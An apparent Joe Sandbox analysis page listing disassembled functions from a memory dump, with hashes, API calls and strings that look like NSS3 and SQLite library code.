%s at line %d of [%.10s], xrefs: 6CF59ECF

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: e6d1ade8527a063b393dcf8a9f3536644b5557f4c550b9469ba328e8e5d99983
Instruction ID: 7c149fddae5f849a17b86ce2c0e226e33bbc958d915038536a1361df20ae1c8f
Opcode Fuzzy Hash: e6d1ade8527a063b393dcf8a9f3536644b5557f4c550b9469ba328e8e5d99983
Instruction Fuzzy Hash: FF81CB71B011158FCB08CF6AC880ADEB7F6EF58304F558529DA15AB741DB31EE56CBA0

Function 6CF67F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6CF681BC

Strings

out of memory, xrefs: 6CF6835B
BINARY, xrefs: 6CF68126

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: 2cb1196e92adff6507fe91700029367b94fd1f7595b029185d59d01dc2530724
Instruction ID: a5bb1f24ecf465fd80e6a6983cf102ae677cd0da20d609f4c5d96ee1795ba17c
Opcode Fuzzy Hash: 2cb1196e92adff6507fe91700029367b94fd1f7595b029185d59d01dc2530724
Instruction Fuzzy Hash: F852C171E05218DFDB14CF9AC890B9EBBB1FF4A308F25815ED855ABB51D730A846CB90

Function 6CEE9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CEE9ED6

Part of subcall function 6CEE14C0: TlsGetValue.KERNEL32 ref: 6CEE14E0
Part of subcall function 6CEE14C0: EnterCriticalSection.KERNEL32 ref: 6CEE14F5
Part of subcall function 6CEE14C0: PR_Unlock.NSS3 ref: 6CEE150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CEE9EE4

Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE10F3
Part of subcall function 6CEE10C0: EnterCriticalSection.KERNEL32(?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE110C
Part of subcall function 6CEE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1141
Part of subcall function 6CEE10C0: PR_Unlock.NSS3(?,?,?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE1182
Part of subcall function 6CEE10C0: TlsGetValue.KERNEL32(?,6CE88802,00000000,00000008,?,6CE7EF74,00000000), ref: 6CEE119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEE9F38

Part of subcall function 6CEED030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6CEE9F0B), ref: 6CEED03B
Part of subcall function 6CEED030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CEED04E
Part of subcall function 6CEED030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6CEED07B
Part of subcall function 6CEED030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6CEED08E
Part of subcall function 6CEED030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CEED09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CEE9F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6CEE9F59

Part of subcall function 6CEE9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CEE9C5B), ref: 6CEE9D82
Part of subcall function 6CEE9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CEE9C5B), ref: 6CEE9DA9
Part of subcall function 6CEE9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CEE9C5B), ref: 6CEE9DCE
Part of subcall function 6CEE9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CEE9C5B), ref: 6CEE9E43

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: 2cef716ff3dd5a9d4f1ad4d3fd44f3a7b80bb2b47464fa9cd7b75be1ee860ac5
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 5E11D3B5F042015BF7109BA5AC01BAA76B5AF982CCF340138E80A8B741FB61EA59C291

Function 6CF9CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CF9D086
PR_Malloc.NSS3(00000001), ref: 6CF9D0B9
PR_Free.NSS3(?), ref: 6CF9D138

Strings

>, xrefs: 6CF9CF5B

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 734c2723415ac51a7db1c140fda11979511ddb8a63dc4a00d35f54f95b3368cd
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 43D16D63B456460FFF14587C8CA13EA77A38782378F784329D5629BBE5E619C883C351

Function 6CF3AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2739c08947f5cae3ec09383a5d06e4ebaf017a6a1ac1313a41070ae1ae1ef3f
Instruction ID: 7f0f841d04562c1e751dbd82f236eaac00c590f9a677432471ee179242c2d4e1
Opcode Fuzzy Hash: b2739c08947f5cae3ec09383a5d06e4ebaf017a6a1ac1313a41070ae1ae1ef3f
Instruction Fuzzy Hash: 10F13371F112629FDF84CF69C8547AAB7F1AB8A308F15862DC909D7750EB30A981CBC1

Function 6CF2DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6CE05001,?,00000003,00000000), ref: 6CF2DFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6CE05001,?), ref: 6CF2E2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6CE05001,?), ref: 6CF2E2DA

Strings

W, xrefs: 6CF2E111

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: 5a9b23bedcdfc43a5b22df54e51b7f649d9b54521975128ea38535bdd04c02bf
Instruction ID: fb1380e86918ba3c96371c20cb500d02ab6de9fd33b4e3dc77c315a2f32ee29a
Opcode Fuzzy Hash: 5a9b23bedcdfc43a5b22df54e51b7f649d9b54521975128ea38535bdd04c02bf
Instruction Fuzzy Hash: B2C11832E052558BDB04CEB584907AA7BB1BF8630AF394179DCA99BB41D7399C02CBD1

Function 6CEF0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CEF1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CEF1086

Strings

h(l, xrefs: 6CEF1062, 6CEF105D, 6CEF0F37, 6CEF1081, 6CEF1082
h(l, xrefs: 6CEF0E55, 6CEF0EC4, 6CEF0F3A, 6CEF0FA7

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(l$h(l
API String ID: 1297977491-3413317348
Opcode ID: 91ecc14416b9f4f4945a376b9b44a36f552fa4597e9d881a1f8ba4daa5dc18b2
Instruction ID: cea579401bea313f9a029361706dd5252f3268ef15dfade82770d2b78232854e
Opcode Fuzzy Hash: 91ecc14416b9f4f4945a376b9b44a36f552fa4597e9d881a1f8ba4daa5dc18b2
Instruction Fuzzy Hash: F7A11D71F0125A9FDF08CF99C990AEEBBB6BF49314B248129E915A7700D735ED12CB90

Function 6CE16F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6CE1702B
sz=[0-9]*, xrefs: 6CE17049
noskipscan*, xrefs: 6CE17067
*?[, xrefs: 6CE17034, 6CE17052, 6CE17070

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: a2ac8ca23976741864c642640f7725fcb44c4f095ba973a663fa4d9bcd7a4cb1
Instruction ID: 0b488ef830040a5220d65a016e7463d0fa56f3317f64dce0860e8519dfc24d51
Opcode Fuzzy Hash: a2ac8ca23976741864c642640f7725fcb44c4f095ba973a663fa4d9bcd7a4cb1
Instruction Fuzzy Hash: A5716932F182114BEB148E6DC88039E73B29F86728F354278CD69ABFD1D6719C5687C2

Function 6CE33EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_temp_master, xrefs: 6CE3460F
sqlite_, xrefs: 6CE33FAA, 6CE34185
sqlite_master, xrefs: 6CE3463F

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: d320c4d5767b2a868ab5cfd99b41bbb2cf5dcdf0ec770b96454797dfcf16c735
Instruction ID: d843852e1b1a39c6909f657cb2c3f1c86c63f7abf6b2b733f29e7d9bfb03bf68
Opcode Fuzzy Hash: d320c4d5767b2a868ab5cfd99b41bbb2cf5dcdf0ec770b96454797dfcf16c735
Instruction Fuzzy Hash: FE224725B495B54FD740CB2580605A67FF2AF4730CB7C65AAC9E9AFB46C223F842CB50

Function 6CF6BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6CF6C0B6

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 2793e1496ebd30a9fa7214272adf8b5570a5bfe5b28e48bcc950c4e0a4dc6151
Instruction ID: 67e83837bc67ea7e2809f13c2540ae20a695fe79b33019b9f746d909fa9b7bdc
Opcode Fuzzy Hash: 2793e1496ebd30a9fa7214272adf8b5570a5bfe5b28e48bcc950c4e0a4dc6151
Instruction Fuzzy Hash: 01928F74A042099FDF05DF96C890BAEB7B2FF48308F284169E855ABB91D735EC46CB50

Function 6CE03D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6CE03EA9

Strings

0, xrefs: 6CE03DAB

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: bea41d2e56d0981ca3fc817ff14d5ff7151ae1557395b1eee7aa5fac240a15db
Instruction ID: 92419e555bc628efa0d87893e4296f26ec6e208f2a4157c8471be8fb7ae9ddfb
Opcode Fuzzy Hash: bea41d2e56d0981ca3fc817ff14d5ff7151ae1557395b1eee7aa5fac240a15db
Instruction Fuzzy Hash: 0D513631F482698AEB15867D88607FFFBB19B83318F38432AC5A267BC1C234455787D1

Function 6CEAEE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CEAF019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6CEAF0F9

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: 3f3a904ec4e38096cf7b08bf2d8542e97bfdce785e39f034cce36594acbd71fb
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: A1918175A0061A8FCB14CFA9C8D16AEB7F1FF85324F24462DD562ABBC0D734A906CB51

Function 6CED2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6CEF7929), ref: 6CED2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6CEF7929), ref: 6CED2FE0

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: af804be8c5b26c689fc4eefd7285a28434f2fdc6bb0e20b1343ef51f6d43b8dd
Instruction ID: 9d41bb6c695d7f67c12b3a98ab8f2a252a61f3356e1f26574ba08c692eaaf389
Opcode Fuzzy Hash: af804be8c5b26c689fc4eefd7285a28434f2fdc6bb0e20b1343ef51f6d43b8dd
Instruction Fuzzy Hash: EC51C2B2A059128FD7108E59C880B6AB3B1EB4531CF3B4169D909ABB02D736FD47CB81

Function 6CE1AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CE1AE9F
winUnlock, xrefs: 6CE1AE18

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 22ea76a1ddedd595605b6ae07516ec0258beb2e5bb978fe9b17b12332a89943e
Instruction ID: de239d084573f43c6769e42f6c3e24901d537f4031fc98185ddf75c03306aa45
Opcode Fuzzy Hash: 22ea76a1ddedd595605b6ae07516ec0258beb2e5bb978fe9b17b12332a89943e
Instruction Fuzzy Hash: 98718F70A18240ABDB44CF28D884BAABBF5FF8A314F14CA1DF95997741D730A985CBC1

Function 6CEDED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CEDEE3D

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 542ae565fdfbf3ea03e14b4e81916b5700253002543fe59ad63e07347e56a090
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: AD71D272E01B018FD718CF59C88566AF7F2AF88308F26462DD85697B91D730F942CB91

Function 6CE05F30 Relevance: 1.6, APIs: 1, Instructions: 350stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000), ref: 6CE06013

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID: strcmp
String ID:
API String ID: 1004003707-0
Opcode ID: 5563418e5ce062fca0135f0344d873b88b9f228a8f1e1cd5f983f7529ede6ea9
Instruction ID: f768354705858614314dcc8b5c954cfa4d920e2acec1bd93ef82005173103d43
Opcode Fuzzy Hash: 5563418e5ce062fca0135f0344d873b88b9f228a8f1e1cd5f983f7529ede6ea9
Instruction Fuzzy Hash: 3BC11471B052068BDB148F15C4517AAB7BAAF4631CF388128DD99D7B42C734E8A2C7D4

Function 6CE14DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CE15125

Memory Dump Source

Source File: 00000000.00000002.1903271898.000000006CE01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1903244859.000000006CE00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903427422.000000006CF9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903468927.000000006CFDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903487981.000000006CFDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903539075.000000006CFE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.1903563074.000000006CFE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
